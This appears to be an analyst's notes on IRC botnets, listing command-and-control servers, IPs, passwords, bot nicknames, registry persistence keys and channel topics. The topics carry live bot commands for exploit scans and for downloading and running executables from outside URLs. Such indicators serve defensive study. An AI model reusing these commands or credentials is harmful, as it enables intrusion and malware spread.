irc.wanger.biz (Yewnix)

irc.wanger.biz:8782
46.4.232.76:8782
Nick: :{00-USA-XP-pc7-7123}
Username: blaze
Server Pass: weed
Joined Channel: #sshscan2
Channel Topic for Channel #sshscan2: ".scan sshgodscan 38 8 0 192.x.x.x -n -b |.scan sshgodscan 30 8 0 141.x.x.x -n -b |.scan sshgodscan 30 8 0 218.x.x.x -n -b"
Set by Yewnix on Tue Dec 21 20:50:57
Private Message to User {iNF-00-USA-XP-p\xb8\x8cI: "SC// Random Port Scan started on 218.x.x.x:22 with a delay of 8 seconds for 0 minutes using 30 threads."
Private Message to User {iNF-00-USA-XP-p\xb8\x8cI: "SC// Random Port Scan started on 192.x.x.x:22 with a delay of 8 seconds for 0 minutes using 38 threads."
Private Message to User {iNF-00-USA-XP-p\xb8\x8cI: "SC// Random Port Scan started on 141.x.x.x:22 with a delay of 8 seconds for 0 minutes using 30 threads."

HKLM\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Run\​
Windows Data Serivce system32.exe
C:\WINDOWS\system32.exe

aaaaaaaa.schooluni.us (bfbot) &(rxbot)

Found 2 addresses
addr: aaaaaaaa.schooluni.us ip: 109.196.130.66
addr: aaaaaaaa.schooluni.us ip: 109.196.130.50

aaaaaaaa.schooluni.us:7196
PASS laorosr
Channel#dpi
Channel#!
KCIK [N00_USA_XP_39922187]
rssr SP2-917 * 0 :COMPUTERNAME
Now talking in #!
Topic is '.asc -S|.http http://61.136.59.34/mobi.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 20 5 0 -b|.asc exp_all 20 5 0 -c|.asc exp_all 10 5 0 -a'
Set by nonSTOPspread66 on Sat Dec 18 23:19:01

Process
HKLM\​SOFTWARE\​Microsoft\​Windows\​CurrentVer.\​policies\​Explorer\​Run\​
Microsoft Driver Setup
C:\WINDOWS\gwdrive32.exe

im.maximum-irc.info

im.maximum-irc.info

Found 4 addresses
addr: im.maximum-irc.info ip: 119.202.198.117
addr: im.maximum-irc.info ip: 139.91.102.100
addr: im.maximum-irc.info ip: 139.91.102.101
addr: im.maximum-irc.info ip: 150.165.168.123
im.maximum-irc.info:9595
139.91.102.101:9595
Nick: [USA|00|XP|P|48168]
Username: ywzyhaf
Server Pass: Peja0444@
Joined Channel: #!!IM!! with Password fatj00
Channel Topic for Channel #!!IM!!: ".dl.start http://dl.dropbox.com/u/14684555/r.exe C:\r.exe 1 -s"

HKLM\​SOFTWARE\​Microsoft\​Windows NT\​CurrentVersion\​Terminal Server\​Install\​Software\​Microsoft\​Windows\​CurrentVersion\​Run\
HKLM\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Run\​
Windows winlogin.exe
C:\WINDOWS\winlogin.exe

bean.F-QACS.INFO

bean.F-QACS.INFO:5337
178.162.175.63:5337
Nick: [NEW][USA]72014
Username: [NEW][USA]72014
Joined Channel: #ed

HKU\​S-1-5-21-842925246-1425521274-308236825-500\​SOFTWARE\​MICROSOFT\​WINDOWS\​CURRENTVERSION\​RUN
Windows Service Host
C:\Documents and Settings\Administrator\Application Data\svchost.exe

flash.quickupdates.net (Yewnix)

flash.quickupdates.net:5337
46.4.232.76:5337
Nick: :{00-USA-XP-pc3-3370}
Username: blaze
Joined Channel: #join with Password error
Channel Topic for Channel #join: ".aSc -S |.sub |.wu |.worm |.scan svrsvc_BRUTE 45 20 100 -r -b -e -s |.scan SVRSVC_ESP 35 3 0 -b -r -e -s |.scan SVRSVC_ESP_SP2 35 3 0 -b -r -e -s |.scan SVRSVC_ARG 35 3 0 -b -r -e -s |.scan SVRSVC_ARG_SP2 35 3 0 -b -r -e -s |.scan SVRSVC_RUS 35 3 0 -b -r -e -s |.scan SVRSVC_RUS_SP2 35 3 0 -b -r -e -s"

HKLM\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Run\​ info
Windows Data Serivce C:\WINDOWS\services.exe